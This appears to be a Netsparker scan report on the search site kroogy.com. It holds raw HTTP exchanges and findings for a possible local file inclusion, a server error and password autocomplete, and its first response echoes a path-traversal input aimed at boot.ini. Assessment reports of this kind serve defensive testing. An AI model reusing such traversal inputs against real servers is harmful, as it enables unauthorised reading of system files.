engine,../../../../../../../../../../boot.ini,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="../../../../../../../../../../boot.ini" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,580,000</span> இல் <span class="resultcountstart">11</span>-<span class="resultcountend">20</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr>..
[Possible] Local File Inclusion

[Possible] Local File Inclusion

1 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depends on these factors an attacker might carry out one or more of the following attacks:

Remedy

- /search/web/Linkbucks%20vlad%20modelS

/search/web/Linkbucks%20vlad%20modelS

http://kroogy.com/search/web/Linkbucks%20vlad%20modelS

Identified Error Message

fopen(.tmpfiles/<b>linkbucks</b>com/gallery-<b>vlad</b><b>models</b>) [function.fopen]: failed to open stream:

Request

GET /search/web/Linkbucks%20vlad%20modelS HTTP/1.1
Referer: http://kroogy.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:34:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11414
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - Linkbucks vlad modelS</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - Linkbucks vlad modelS"><meta name="keywords" content="Kroogy Search,search,search engine,Linkbucks vlad modelS,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.typesearchtd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.conversiontable
{
width:100%;
}
.conversiontd
{
padding-left:10px;
padding-right:10px;
padding-bottom:20px;
}
.conversionkeyword
{
font-size:18px;
font-style:italic;
}
.conversiontarget
{
font-size:18px;
font-style:italic;
}


.viewmorelinktd
{
padding-bottom:15px;
}
.viewmorelink
{
font-size:12px;
}
.showimagetd
{
padding-bottom:5px;
}

.imagepreviewlinkweb
{
font-size:12px;
}

.resultcountstart
{
font-size:13px;
font-weight:bold;
}

.resultcountend
{
font-size:13px;
font-weight:bold;
}
.totalresults
{
font-size:13px;
font-weight:bold;
}
.keywordintotal
{
font-size:13px;
font-weight:bold;
}


.thumbshotimage
{
border: 1px solid black;

}

.outermaincontainer
{
align:center;
width:100%;
}

.outermainresulttd
{
vertical-align:top;
width:850px;
padding:10px;
}
outermainimageresulttd
{
vertical-align:top;
width:100%;
padding:10px;
}
.totaltable
{
width:100%;
height:30px;
padding-left:0px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.totaltext
{

font-size:12px;


}
.typesearchtext
{
text-transform: capitalize;
font-size:12px;
font-weight:bold;
}
.spelltable
{
height:30px;
width:100%;
font-family:Verdana, Arial, Helvetica, sans-serif;
padding:20px;
}
.spellsuggestiontext
{
padding-left:10px;
padding-right:10px;
font-size:13px;
font-weight:bold;

}
.spelllink
{
font-weight:bold;
font-size:13px;
color:green;
}
.resultsetwrapper
{
width:100%;
}
.resultsetwrappertd
{

}
.resulttable
{
width:100%;
}
.thumbshotimage
{
width:100px;
heigth:100px;
}
.resulttd
{
width:100%;
valign:top;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.resulttitle
{
font-size:13px;
valign:top;
font-family:verdana,Arial, Helvetica, sans-serif;
}
.resulttitle a:hover
{
color:red;
}
.resultlink
{

}
.newwindowimage
{
width:11px;
height:11px;
}
.resultdescription
{
font-size:11px;
}
.resulturl
{
font-size:12px;
color:green;
}
.emailfrndlink
{
font-size:12px;
}
.seperationtd
{
height:10px;
}
.footerpagetable
{
width:100%;
}
.relatedkeywordstable
{
width:100%;
}

.footerpagetd a
{
text-decoration:none;
font-size:14px;
color:#0368ab;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
font-family:Arial, Helvetica, sans-serif;
}
.footerpagetd a:hover
{
text-decoration:none;
font-size:14px;
color:#fff;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
background-color:#0368ab;
}


.footerpagetext
{
font-size:15px;
color:black;
font-weight:bold;
}
.footerpagetd
{
padding:10px;
height:40px;


}
.relatedkeywordstd
{
height:40px;
padding-left:10px;
padding-right:10px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.relatedkeywordmessage
{
font-size:12px;
font-weight:bold;
}
.relatedkeywordlink
{
font-size:12px;
font-weight:bold;
}

.imagedomain
{

font-size:10px;
color:green;
line-height:15px;
}
.imagedetails
{

font-size:10px;
line-height:15px;
font
}
.imagetitle
{

font-size:11px;
line-height:25px;
}
.imagepreview
{
font-size:11px;
}
.imageresulttd
{
padding-left:10px;
padding-bottom:15px;
padding-right:10px;
font-family:Verdana;
}

.videoresulttd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
font-family:Verdana;
}
.videotitle
{

font-size:11px;
line-height:20px;
font-weight:bold;

}
.videoduration
{
font-size:10px;
color:green;
line-height:15px;
}
.videopublishedon
{
font-size:10px;
line-height:15px;
}
.thumbshottd
{
padding-bottom:5px;
padding-right:10px;
vertical-align:top;
padding-left:10px;
}

.imageresultsinwebtd
{
padding-left:10px;
vertical-align:bottom;

}
.imageresultinweb
{
border: 1px solid black;
max-height:80px;
}
.imageresultinwebviewmorelink
{
font-size:12px;
font-weight:bold;
}
.arithmeticconversiontd
{
padding-left:10px;
padding-right:10px;
padding-top:10px;
font-size:14px;
font-weight:bold;
}
.qlook
{
font-size:12px;
}

.emaillinkimage
{
width:12px;
height:12px;
}
.arithmeticconversionkeyword
{
font-size:16px;
font-weight:bold;
}

.arithmeticcoversionresult
{
font-size:16px;
font-weight:bold;

}

.noresulttext
{
font-size:12px;
font-weight:bold;

}
.noresulttd
{
padding-top:15px;
padding-left:15px;
align-text:center;
padding-right:15px;
}
.quicklooktd
{
padding-left:10px;
}
.imageresultinwebviewmorelinktd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
}
.outermainadtd
{
padding-top:20px;
padding-left:10px;
padding-right:10px;
vertical-align:top;
}

.amazonnavigationoptiontext
{

font-size:12px;
font-weight:bold;

}
.amazoncountrytd
{
padding-top:10px;
}
.amazoncategorytd
{
padding-top:10px;
}

.ebaythumbshotimage
{
border: 1px solid black;
width:80px;
}

.amazonthumbshotimage
{
width:55px;
border: 1px solid black;
}
.box
{
background-color: #F0F8FF;
}
.border
{
border-left-color: #d3e1f9;
border-right-color: #d3e1f9;
}/* CSS Document */

.body td, tr
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}

#countries,#optionallanguage,#themegroup
{
background-color:#e4f2fc;
height:22px;
border-width:1px;
border-style:solid;
Border-color:#aaaaaa;

}

.advancedsearchsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}
.advancedsearchtexttd
{
width:250px;
padding-left:5px;
height:40px;
padding-right:5px;

}
.advancedsearchfieldtd
{
padding-bottom:15px;
}
.advancedsearchtextstyle
{
font-size:12px;

}
.advancedsearchtable
{
width:700px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}
.advancedsearchexampletext
{
font-size:12px;
}

.advancedsearchtitletable
{
width:700px;
margin-top:20px;
background-color:#e1e1e1;
padding-top:15px;
padding-bottom:15px;
}
.advancedsearchtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.advancedsearchsubtitletext
{
font-size:12px;
font-weight:bold;
}

.footertable
{
width:100%;
padding-top:15px;


}
.footertext
{
font-size:12px;
}
.footertd
{
padding-left:10px;
}
.headerlinkstd
{
width:100%;

padding-right:5px;
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
}

.headerlinkstd a ,.headerlinkstd a:visited
{
color:#000000;
font-weight:bold;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;

}

.languagetd
{
padding-left:5px;
font-size:12px;
height:30px;
}
.headerlink
{
font-size:12px;
}
.themetd
{
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
color:#000;

}
.cloudtagtd
{
margin-top:20px;
padding-top:5px;
padding-left:5px;
border-color:#77c3fa;
border-width:1px;
border-style:solid;
padding-bottom:5px;

padding-left:5px;
padding-right:5px;

}

.cloudtagtd a
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.generallinks
{
font-size:12px;
}
.opendirectorytd
{
padding-top:10px;
}
.advancetd
{
height:20px;
padding-left:5px;
font-size:13px;
}

.footerlinktd
{
height:15px;
border-top: #045c97;
padding-top:5px;

border-top-style: solid;
border-top-width: 1px;
}
.stdpagetitle
{
font-size:14px;
font-weight:bold;

}
.emailafrndurltd , .emaillinkdesctd
{
padding-top;5px;
background-color:#e4f2fc;
padding-bottom:5px;
}
.emailafrndurl
{
font-size:12px;
font-weight:bold;
}
.outermainoptionstd
{
padding-left:15px;
padding-right:15px;
padding-top:5px;
padding-bottom:5px;
font-size:12px;
background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;

}
.outermainlogotd
{
width:5%;
padding-top:5px;
padding-bottom:5px;
padding-left:15px;
padding-right:15px;

background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
.outermaintabtd
{

padding-top:10px;
padding-bottom:5px;
padding-left:0px;
padding-right:0px;
vertical-align:bottom;


background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
#mandatory
{
color:red;
font-size:10px;
font-weight:bold;
vertical-align:top;
padding-left:2px;
padding-right:2px;
}
#morelanguagesdiv
{
font-size:11px;
}
.advancetd a
{

font-size:11px;

}



.generatesearchboxtable
{
width:900px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}


.generatesearchboxtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.generatesearchboxpagetitle
{
font-size:14px;
font-weight:bold;

}


.generatesearchboxtexttd
{

padding-left:5px;
height:40px;
padding-right:5px;

}
.generatesearchboxtextstyle
{
font-size:12px;

}


.generatesearchboxsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}

.generatesearchboxsubtitletext
{
font-size:12px;

font-weight:bold;


}


.generatesearchboxenginestextstyle
{
font-size:12px;
text-transform: capitalize;

}
-->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementByI..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/

/search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/ CONFIRMED

http://kroogy.com/search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/

Request

GET /search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/ HTTP/1.1
Referer: http://kroogy.com/search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/index.cfm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl; PHPSESSID=totjukp6oqa5l5opadu8gndj05
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 24 Apr 2011 12:45:03 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 452
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@loft7620.serverloft.eu and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.2.3 (CentOS) Server at kroogy.com Port 80</address></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /pub/

/pub/ CONFIRMED

http://kroogy.com/pub/

Identified Field Name

PASSWORD

Request

GET /pub/ HTTP/1.1
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Set-Cookie: PHPSESSID=totjukp6oqa5l5opadu8gndj05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 440
Connection: close
Content-Type: text/html


